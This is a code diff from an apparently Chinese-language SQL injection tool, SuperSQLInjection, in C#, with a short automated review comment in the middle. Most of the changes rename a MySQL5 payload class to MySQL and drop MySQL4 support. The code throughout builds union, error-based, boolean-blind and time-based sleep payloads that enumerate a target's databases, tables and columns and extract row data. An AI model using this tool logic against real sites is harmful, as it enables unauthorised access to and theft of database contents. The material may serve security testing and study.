@@ -1086,7 +1060,7 @@ namespace SuperSQLInjection int ascii = getValue(dp, 32, 126); value += (char)ascii; } - this.Invoke(new showLogDelegate(log), vs[0] + "值为-----:" + value, LogLevel.info); + this.Invoke(new showLogDelegate(log), vs[0] + "值为:" + value, LogLevel.info); this.Invoke(new setVariableDelegate(setVariable), vs[0], value); } @@ -1135,22 +1109,22 @@ namespace SuperSQLInjection { int db_index = int.Parse(oindex.ToString()); //判断对应下标的数据库长度 - String payload_len = MySQL5.ver_length.Replace("{data}", MySQL5.db_value.Replace("{index}", oindex.ToString())); + String payload_len = MySQL.ver_length.Replace("{data}", MySQL.db_value.Replace("{index}", oindex.ToString())); if (config.keyType.Equals(KeyType.Time)) { - payload_len = MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", MySQL5.db_value.Replace("{index}", oindex.ToString())), config.maxTime); + payload_len = MySQL.getBoolCountBySleep(MySQL.bool_length.Replace("{data}", MySQL.db_value.Replace("{index}", oindex.ToString())), config.maxTime); } //判断当前数据库长度限制1-50 int len = getValue(payload_len, 1, 50); - this.Invoke(new showLogDelegate(log), "数据库" + (db_index + 1) + "长度为-----:" + len, LogLevel.info); + this.Invoke(new showLogDelegate(log), "数据库" + (db_index + 1) + "长度为:" + len, LogLevel.info); //判断当前数据库对应的ascii码 - String va_payload = MySQL5.ver_value.Replace("{data}", MySQL5.db_value.Replace("{index}", oindex.ToString())); + String va_payload = MySQL.ver_value.Replace("{data}", MySQL.db_value.Replace("{index}", oindex.ToString())); if (config.keyType.Equals(KeyType.Time)) { - va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value.Replace("{data}", MySQL5.db_value.Replace("{index}", oindex.ToString())), config.maxTime); + va_payload = MySQL.getBoolCountBySleep(MySQL.bool_value.Replace("{data}", MySQL.db_value.Replace("{index}", oindex.ToString())), config.maxTime); } String value = ""; //获取值 
@@ -1191,7 +1165,7 @@ namespace SuperSQLInjection String data_payload = MSSQL.db_value.Replace("{index}", db_index.ToString()); int len = getValueByStepUp(MSSQL.bool_length.Replace("{data}", data_payload), 0, 10); - this.Invoke(new showLogDelegate(log), "数据库" + db_index + "长度为-----:" + len,LogLevel.info); + this.Invoke(new showLogDelegate(log), "数据库" + db_index + "长度为:" + len,LogLevel.info); //判断当前数据库对应的ascii码 String va_payload = MSSQL.bool_value.Replace("{data}", MSSQL.db_value.Replace("{index}", oindex.ToString())); @@ -1247,7 +1221,7 @@ namespace SuperSQLInjection String data_payload = MSSQL.db_value.Replace("{index}", db_index.ToString()); int len = getValueByStepUp(MSSQL.getBoolCountBySleep(MSSQL.bool_length.Replace("{data}", data_payload), config.maxTime), 0, 10); - this.Invoke(new showLogDelegate(log), "数据库" + db_index + "长度为-----:" + len, LogLevel.info); + this.Invoke(new showLogDelegate(log), "数据库" + db_index + "长度为:" + len, LogLevel.info); String value = ""; //获取值 @@ -1313,7 +1287,7 @@ namespace SuperSQLInjection //判断当前数据库长度限制1-50 int len = getValue(payload_len, 1, 50); - this.Invoke(new showLogDelegate(log), "数据库" + (db_index + 1) + "长度为-----:" + len,LogLevel.info); + this.Invoke(new showLogDelegate(log), "数据库" + (db_index + 1) + "长度为:" + len,LogLevel.info); //判断当前数据库对应的ascii码 String va_payload = Oracle.bool_value.Replace("{data}", Oracle.db_value.Replace("{index}", oindex.ToString())); 
@@ -1353,9 +1327,9 @@ namespace SuperSQLInjection { //获取数据库数量 List data_list = new List(); - data_list.Add(MySQL5.db_value.Replace("{index}", oindex.ToString())); - String db_Name_data = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); - String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", db_Name_data)); + data_list.Add(MySQL.db_value.Replace("{index}", oindex.ToString())); + String db_Name_data = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); + String result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", db_Name_data)); this.Invoke(new showLogDelegate(log), "数据库" + oindex + "的名称为:" + result,LogLevel.info); this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), result); } @@ -1419,9 +1393,9 @@ namespace SuperSQLInjection try { List data_list = new List(); - data_list.Add(MySQL5.db_value.Replace("{index}", oindex.ToString())); - String db_Name_data = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1); - String result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", db_Name_data)); + data_list.Add(MySQL.db_value.Replace("{index}", oindex.ToString())); + String db_Name_data = MySQL.creatMySQLColumnsStrByError(data_list, null, null, -1); + String result = getOneDataByUnionOrError(MySQL.error_value.Replace("{data}", db_Name_data)); this.Invoke(new showLogDelegate(log), "数据库" + oindex + "的名称为:" + result, LogLevel.info); this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), result); } 
@@ -1491,23 +1465,23 @@ namespace SuperSQLInjection SelectNode sn = (SelectNode)osn; int selectIndex = sn.tn.Index; //判断当前表长度 - String data_payload = MySQL5.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("{index}", sn.limit + ""); + String data_payload = MySQL.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("{index}", sn.limit + ""); int len = 0; if (config.keyType.Equals(KeyType.Time)) { - len = getValue(MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", data_payload), config.maxTime), 1, 50); + len = getValue(MySQL.getBoolCountBySleep(MySQL.bool_length.Replace("{data}", data_payload), config.maxTime), 1, 50); } else { - len = getValue(MySQL5.ver_length.Replace("{data}", data_payload), 1, 50); + len = getValue(MySQL.ver_length.Replace("{data}", data_payload), 1, 50); } //判断当前数据库对应的ascii码 - String va_payload = MySQL5.ver_value.Replace("{data}", data_payload); + String va_payload = MySQL.ver_value.Replace("{data}", data_payload); if (config.keyType.Equals(KeyType.Time)) { - va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value, config.maxTime).Replace("{data}", data_payload); + va_payload = MySQL.getBoolCountBySleep(MySQL.bool_value, config.maxTime).Replace("{data}", data_payload); } String value = ""; 
@@ -1682,9 +1656,9 @@ namespace SuperSQLInjection SelectNode sn = (SelectNode)osn; List data_list = new List(); - data_list.Add(MySQL5.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("{index}", sn.limit.ToString())); - String tables_value_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); - String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", tables_value_payload)); + data_list.Add(MySQL.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("{index}", sn.limit.ToString())); + String tables_value_payload = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); + String result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", tables_value_payload)); this.Invoke(new showLogDelegate(log), "数据库" + sn.dbname + "发现表:" + result, LogLevel.info); this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table"); 
@@ -1727,9 +1701,9 @@ namespace SuperSQLInjection SelectNode sn = (SelectNode)osn; List data_list = new List(); - data_list.Add(MySQL5.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("{index}", sn.limit.ToString())); - String table_value_payload = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1); - String result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", table_value_payload)); + data_list.Add(MySQL.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("{index}", sn.limit.ToString())); + String table_value_payload = MySQL.creatMySQLColumnsStrByError(data_list, null, null, -1); + String result = getOneDataByUnionOrError(MySQL.error_value.Replace("{data}", table_value_payload)); this.Invoke(new showLogDelegate(log), "数据库" + sn.dbname + "发现表:" + result, LogLevel.info); this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table"); @@ -1820,6 +1794,43 @@ namespace SuperSQLInjection return newpayload; } + static char[] ss = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9', '_'}; + + + + + /// + /// Like判断 + /// + /// 获取数据Like paylaod + /// 开始值 + /// 最大值 + /// + public String getLikeValue(String payLoadStr) + { + int index = 0; + StringBuilder value = new StringBuilder(); + String startStr = ""; + while (index /// 二分法判断 /// 
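Review bot: The doc comment added above `getLikeValue` lists three parameters (payload, start value, maximum value), but the signature takes only `String payLoadStr`, so two of the entries describe arguments that do not exist. The XML tags appear stripped on this page, so check the comment against the file. The new field `static char[] ss` has no access modifier, is not `readonly`, and its name says nothing about its purpose. Declaring it as `private static readonly char[] ss = { ... };` with a one-line comment naming it as the candidate character set would stop other code in the form from reassigning it. The method body is cut off on this page, so the loop itself is not reviewed here.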
@@ -2093,14 +2104,11 @@ namespace SuperSQLInjection case DBType.Access: MessageBox.Show("抱歉Access数据库,不支持错误显示注入!"); break; - case DBType.MySQL4: - MessageBox.Show("抱歉MySQL4数据库,不支持错误显示注入!"); - break; - case DBType.MySQL5: + case DBType.MySQL: - data_list.Add(MySQL5.dbs_count); - db_Count_data = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1); - result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", db_Count_data)); + data_list.Add(MySQL.dbs_count); + db_Count_data = MySQL.creatMySQLColumnsStrByError(data_list, null, null, -1); + result = getOneDataByUnionOrError(MySQL.error_value.Replace("{data}", db_Count_data)); this.Invoke(new showLogDelegate(log), "报告大侠,我发现了" + result + "个数据库!", LogLevel.info); db_len = Tools.convertToInt(result); this.dbsCount = db_len; @@ -2174,13 +2182,11 @@ namespace SuperSQLInjection { case DBType.Access: break; - case DBType.MySQL4: - break; - case DBType.MySQL5: + case DBType.MySQL: //获取数据库数量 - data_list.Add(MySQL5.dbs_count); - db_Count_data = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); - result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", db_Count_data)); + data_list.Add(MySQL.dbs_count); + db_Count_data = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); + result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", db_Count_data)); this.Invoke(new showLogDelegate(log), "报告大侠,我发现了" + result + "个数据库!", LogLevel.info); db_len = Tools.convertToInt(result); 
@@ -2253,18 +2259,15 @@ namespace SuperSQLInjection case DBType.Access: MessageBox.Show("Access数据库没有库!"); break; - case DBType.MySQL4: - - break; - case DBType.MySQL5: + case DBType.MySQL: //获取数据库数量 if (KeyType.Time.Equals(config.keyType)) { - db_len = getValueByStepUp(MySQL5.getBoolCountBySleep(MySQL5.dbs_count, config.maxTime), 0, 10); + db_len = getValueByStepUp(MySQL.getBoolCountBySleep(MySQL.dbs_count, config.maxTime), 0, 10); } else { - db_len = getValueByStepUp(MySQL5.bool_db_count, 0, 10); + db_len = getValueByStepUp(MySQL.bool_db_count, 0, 10); } this.Invoke(new showLogDelegate(log), "报告大侠,我发现了" + db_len + "个数据库!", LogLevel.info); @@ -2436,19 +2439,16 @@ namespace SuperSQLInjection } checkTablesDic(tn); break; - case DBType.MySQL4: - - break; - case DBType.MySQL5: + case DBType.MySQL: //获取当前数据库长度 if (config.keyType.Equals(KeyType.Time)) { - this.tableCount = getValueByStepUp(MySQL5.getBoolCountBySleep(MySQL5.tables_count.Replace("'{dbname}'", Tools.strToHex(dbname, "UTF-8")), config.maxTime), 0, 50); + this.tableCount = getValueByStepUp(MySQL.getBoolCountBySleep(MySQL.tables_count.Replace("'{dbname}'", Tools.strToHex(dbname, "UTF-8")), config.maxTime), 0, 50); } else { - this.tableCount = getValueByStepUp(MySQL5.bool_tables_count.Replace("'{dbname}'", Tools.strToHex(dbname, "UTF-8")), 0, 50); + this.tableCount = getValueByStepUp(MySQL.bool_tables_count.Replace("'{dbname}'", Tools.strToHex(dbname, "UTF-8")), 0, 50); } this.Invoke(new showLogDelegate(log), "报告大侠,数据库" + dbname + "发现" + this.tableCount + "个表!", LogLevel.info); 
@@ -2530,14 +2530,11 @@ namespace SuperSQLInjection } checkTablesDic(tn); break; - case DBType.MySQL4: - - break; - case DBType.MySQL5: + case DBType.MySQL: //获取当前数据库表数量 - data_list.Add(MySQL5.tables_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8"))); - tables_count_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); - result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", tables_count_payload)); + data_list.Add(MySQL.tables_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8"))); + tables_count_payload = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); + result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", tables_count_payload)); this.Invoke(new showLogDelegate(log), "报告大侠,数据库" + dbName + "有" + Tools.convertToInt(result) + "个表!", LogLevel.info); this.tableCount = Tools.convertToInt(result); @@ -2605,14 +2602,11 @@ namespace SuperSQLInjection case DBType.Access: MessageBox.Show("抱歉Access数据库不支持错误显示注入!"); break; - case DBType.MySQL4: - MessageBox.Show("抱歉MySQL4数据库,不支持错误显示注入!"); - break; - case DBType.MySQL5: + case DBType.MySQL: //获取当前数据库表长度 - data_list.Add(MySQL5.tables_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8"))); - tables_count_payload = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1); - result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", tables_count_payload)); + data_list.Add(MySQL.tables_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8"))); + tables_count_payload = MySQL.creatMySQLColumnsStrByError(data_list, null, null, -1); + result = getOneDataByUnionOrError(MySQL.error_value.Replace("{data}", tables_count_payload)); this.Invoke(new showLogDelegate(log), "报告大侠,数据库" + dbName + "有" + Tools.convertToInt(result) + "个表!", LogLevel.info); this.tableCount = Tools.convertToInt(result); 
@@ -2786,23 +2780,23 @@ namespace SuperSQLInjection { SelectNode sn = (SelectNode)osn; //判断当前表长度 - String data_payload = MySQL5.column_value.Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8")).Replace("{index}", sn.limit + "").Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")); + String data_payload = MySQL.column_value.Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8")).Replace("{index}", sn.limit + "").Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")); int len = 0; if (KeyType.Time.Equals(config.keyType)) { - len = getValue(MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", data_payload), config.maxTime), 1, 50); + len = getValue(MySQL.getBoolCountBySleep(MySQL.bool_length.Replace("{data}", data_payload), config.maxTime), 1, 50); } else { - len = getValue(MySQL5.ver_length.Replace("{data}", data_payload), 1, 50); + len = getValue(MySQL.ver_length.Replace("{data}", data_payload), 1, 50); } //判断当前数据库对应的ascii码 - String va_payload = MySQL5.ver_value.Replace("{data}", data_payload); + String va_payload = MySQL.ver_value.Replace("{data}", data_payload); if (KeyType.Time.Equals(config.keyType)) { - va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value.Replace("{data}", data_payload), config.maxTime); + va_payload = MySQL.getBoolCountBySleep(MySQL.bool_value.Replace("{data}", data_payload), config.maxTime); } String value = ""; //获取值 
@@ -2975,9 +2969,9 @@ namespace SuperSQLInjection SelectNode sn = (SelectNode)osn; //获取数据库数量 List data_list = new List(); - data_list.Add(MySQL5.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8"))); - String column_Name_data = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); - String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", column_Name_data)); + data_list.Add(MySQL.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8"))); + String column_Name_data = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); + String result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", column_Name_data)); this.Invoke(new showLogDelegate(log), "发现列:" + result, LogLevel.info); this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "column"); } 
@@ -3041,9 +3035,9 @@ namespace SuperSQLInjection SelectNode sn = (SelectNode)osn; //获取数据库数量 List data_list = new List(); - data_list.Add(MySQL5.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8"))); - String column_Name_data = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1); - String result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", column_Name_data)); + data_list.Add(MySQL.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8"))); + String column_Name_data = MySQL.creatMySQLColumnsStrByError(data_list, null, null, -1); + String result = getOneDataByUnionOrError(MySQL.error_value.Replace("{data}", column_Name_data)); this.Invoke(new showLogDelegate(log), "发现列:" + result, LogLevel.info); this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "column"); } 
@@ -3110,18 +3104,15 @@ namespace SuperSQLInjection case DBType.Access: checkColumnsDic(ctn); break; - case DBType.MySQL4: - - break; - case DBType.MySQL5: + case DBType.MySQL: if (KeyType.Time.Equals(config.keyType)) { - columns_count = getValueByStepUp(MySQL5.getBoolCountBySleep(MySQL5.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8")), config.maxTime), 0, 20); + columns_count = getValueByStepUp(MySQL.getBoolCountBySleep(MySQL.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8")), config.maxTime), 0, 20); } else { - columns_count = getValueByStepUp(MySQL5.bool_columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8")), 0, 20); + columns_count = getValueByStepUp(MySQL.bool_columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8")), 0, 20); } this.Invoke(new showLogDelegate(log), "报告大侠,表" + tableName + "发现" + columns_count + "个列!",LogLevel.info); 
@@ -3214,13 +3205,10 @@ namespace SuperSQLInjection case DBType.Access: checkColumnsDic(ctn); break; - case DBType.MySQL4: - - break; - case DBType.MySQL5: - data_list.Add(MySQL5.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8"))); - columns_count_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); - result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", columns_count_payload)); + case DBType.MySQL: + data_list.Add(MySQL.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8"))); + columns_count_payload = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); + result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", columns_count_payload)); this.Invoke(new showLogDelegate(log), "报告大侠,表" + tableName + "有" + Tools.convertToInt(result) + "个列!", LogLevel.info); columns_count = Tools.convertToInt(result); 
@@ -3302,14 +3290,11 @@ namespace SuperSQLInjection case DBType.Access: MessageBox.Show("抱歉Access数据库,不支持错误显示注入!"); break; - case DBType.MySQL4: - MessageBox.Show("抱歉MySQL4数据库,不支持错误显示注入!"); - break; - case DBType.MySQL5: + case DBType.MySQL: - data_list.Add(MySQL5.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8"))); - columns_count_payload = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1); - result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", columns_count_payload)); + data_list.Add(MySQL.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8"))); + columns_count_payload = MySQL.creatMySQLColumnsStrByError(data_list, null, null, -1); + result = getOneDataByUnionOrError(MySQL.error_value.Replace("{data}", columns_count_payload)); this.Invoke(new showLogDelegate(log), "报告大侠,表" + tableName + "有" + Tools.convertToInt(result) + "个列!", LogLevel.info); columns_count = Tools.convertToInt(result); @@ -3423,7 +3408,7 @@ namespace SuperSQLInjection GetDataPam gp = (GetDataPam)opam; - String data_payload = MySQL5.data_value.Replace("{dbname}", gp.dbname).Replace("{table}", gp.table).Replace("{limit}", gp.limit + ""); + String data_payload = MySQL.data_value.Replace("{dbname}", gp.dbname).Replace("{table}", gp.table).Replace("{limit}", gp.limit + ""); ListViewItem lvi = null; 
@@ -3431,28 +3416,28 @@ namespace SuperSQLInjection { //取每一列的值 - String payload_len = MySQL5.ver_length.Replace("{data}", data_payload).Replace("{columns}", columnName); + String payload_len = MySQL.ver_length.Replace("{data}", data_payload).Replace("{columns}", columnName); if (config.keyType.Equals(KeyType.Time)) { - payload_len = MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", data_payload).Replace("{columns}", columnName), config.maxTime); + payload_len = MySQL.getBoolCountBySleep(MySQL.bool_length.Replace("{data}", data_payload).Replace("{columns}", columnName), config.maxTime); } int len = getValueByStepUp(payload_len, 0, 50); - String va_payload = MySQL5.ver_value.Replace("{data}", data_payload).Replace("{columns}", columnName); + String va_payload = MySQL.ver_value.Replace("{data}", data_payload).Replace("{columns}", columnName); String colvalue = ""; //获取值 for (int i = 1; i <= len; i++) { - String tmp_va_payload = MySQL5.ord_value.Replace("{data}", data_payload).Replace("{index}", i + "").Replace("{columns}", columnName); - String plen = MySQL5.ver_length.Replace("{data}", tmp_va_payload); + String tmp_va_payload = MySQL.ord_value.Replace("{data}", data_payload).Replace("{index}", i + "").Replace("{columns}", columnName); + String plen = MySQL.ver_length.Replace("{data}", tmp_va_payload); int mu_payload_len = 0; //MySQL多字节ord,先判断ord后的长度,在取每一个的值 if (config.keyType.Equals(KeyType.Time)) { - mu_payload_len = getValue(MySQL5.getBoolCountBySleep(MySQL5.char_len.Replace("{data}", tmp_va_payload), config.maxTime), 2, 8); + mu_payload_len = getValue(MySQL.getBoolCountBySleep(MySQL.char_len.Replace("{data}", tmp_va_payload), config.maxTime), 2, 8); } else { 
@@ -3469,11 +3454,11 @@ namespace SuperSQLInjection int ascii = 0; if (config.keyType.Equals(KeyType.Time)) { - ascii = getValue(MySQL5.getBoolCountBySleep(MySQL5.mid_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), config.maxTime), 0, 9); + ascii = getValue(MySQL.getBoolCountBySleep(MySQL.mid_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), config.maxTime), 0, 9); } else { - ascii = getValue(MySQL5.bool_ord_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), 0, 9); + ascii = getValue(MySQL.bool_ord_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), 0, 9); } ver_tmp[m_index - 1] = ascii + ""; m_index++; @@ -3807,8 +3792,8 @@ namespace SuperSQLInjection { GetDataPam gp = (GetDataPam)opam; - String datas_value_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, gp.columns, gp.table, gp.dbname, gp.limit); - String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", datas_value_payload)); + String datas_value_payload = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, gp.columns, gp.table, gp.dbname, gp.limit); + String result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", datas_value_payload)); this.Invoke(new showLogDelegate(log), "报告大侠,获取到第" + (gp.limit + 1) + "行数据", LogLevel.info); String[] datas = Regex.Split(result, "\\$\\$\\$"); 
@@ -3925,16 +3910,16 @@ namespace SuperSQLInjection { //获取数据长度 - String datas_payload_columns = MySQL5.creatMySQLColumnStr(column); - String datas_payload_length = MySQL5.char_length.Replace("{data}", "(select " + datas_payload_columns + " from " + gp.dbname + "." + gp.table + " limit " + gp.limit + ",1)"); + String datas_payload_columns = MySQL.creatMySQLColumnStr(column); + String datas_payload_length = MySQL.char_length.Replace("{data}", "(select " + datas_payload_columns + " from " + gp.dbname + "." + gp.table + " limit " + gp.limit + ",1)"); - String d_l_e = MySQL5.creatMySQLColumnStr("(" + datas_payload_length + ")"); - String datas_payload_length_error = MySQL5.error_value.Replace("{data}", d_l_e); + String d_l_e = MySQL.creatMySQLColumnStr("(" + datas_payload_length + ")"); + String datas_payload_length_error = MySQL.error_value.Replace("{data}", d_l_e); String result_length = getOneDataByUnionOrError(datas_payload_length_error); int sumlen = Tools.convertToInt(result_length); - String datas_value_payload = "(select " + MySQL5.creatMySQLColumnsStrByError(column, gp.table, gp.dbname, gp.limit) + ")"; + String datas_value_payload = "(select " + MySQL.creatMySQLColumnsStrByError(column, gp.table, gp.dbname, gp.limit) + ")"; String result = ""; int start = 1; //每次获取长度,err方式有长度限制 @@ -3943,8 +3928,8 @@ namespace SuperSQLInjection while (start < sumlen) { //hex编码,防止中文等乱码 - String datas_value_column = ByPassForBetween(MySQL5.substr_value.Replace("{data}", datas_value_payload).Replace("{start}", start.ToString()), count); - String c_datas_value_payload = MySQL5.error_value.Replace("{data}", datas_value_column); + String datas_value_column = ByPassForBetween(MySQL.substr_value.Replace("{data}", datas_value_payload).Replace("{start}", start.ToString()), count); + String c_datas_value_payload = MySQL.error_value.Replace("{data}", datas_value_column); result += getOneDataByUnionOrError(c_datas_value_payload); start += count; } 
@@ -4137,18 +4122,15 @@ namespace SuperSQLInjection MessageBox.Show("没有这么多行数据,请改小点!"); } break; - case DBType.MySQL4: - - break; - case DBType.MySQL5: + case DBType.MySQL: if (config.keyType.Equals(KeyType.Time)) { - isMax = findKeyInBody(MySQL5.getBoolCountBySleep(MySQL5.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), config.maxTime), (start + dataCount)); + isMax = findKeyInBody(MySQL.getBoolCountBySleep(MySQL.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), config.maxTime), (start + dataCount)); } else { - isMax = findKeyInBody(MySQL5.bool_datas_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), (start + dataCount)); + isMax = findKeyInBody(MySQL.bool_datas_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), (start + dataCount)); } if (isMax) @@ -4253,14 +4235,10 @@ namespace SuperSQLInjection case DBType.Access: MessageBox.Show(ErrorMessage.access_no_error_inject_info); break; - case DBType.MySQL4: - MessageBox.Show(ErrorMessage.mysql4_no_error_inject_info); - break; - case DBType.MySQL5: - - data_list.Add(MySQL5.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table)); - datas_count_payload = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1); - result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", datas_count_payload)); + case DBType.MySQL: + data_list.Add(MySQL.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table)); + datas_count_payload = MySQL.creatMySQLColumnsStrByError(data_list, null, null, -1); + result = getOneDataByUnionOrError(MySQL.error_value.Replace("{data}", datas_count_payload)); this.Invoke(new showLogDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!", LogLevel.success); 
@@ -4386,13 +4364,10 @@ namespace SuperSQLInjection } stp.WaitForIdle(); break; - case DBType.MySQL4: - - break; - case DBType.MySQL5: - data_list.Add(MySQL5.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table)); - datas_count_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); - result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", datas_count_payload)); + case DBType.MySQL: + data_list.Add(MySQL.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table)); + datas_count_payload = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); + result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", datas_count_payload)); this.Invoke(new showLogDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!", LogLevel.success); @@ -4562,7 +4537,7 @@ namespace SuperSQLInjection public Thread injectThread = null; private void btn_autoInject_Click(object sender, EventArgs e) { - + Tools.getRequestURI(this.txt_inject_request.Text); if (autoinject == 0) { if (config.request.IndexOf("#inject#") != -1) @@ -4629,7 +4604,6 @@ namespace SuperSQLInjection String request = config.request.Replace(data, strparam); ServerInfo oserver = HTTP.sendRequestRetry(config.useSSL, 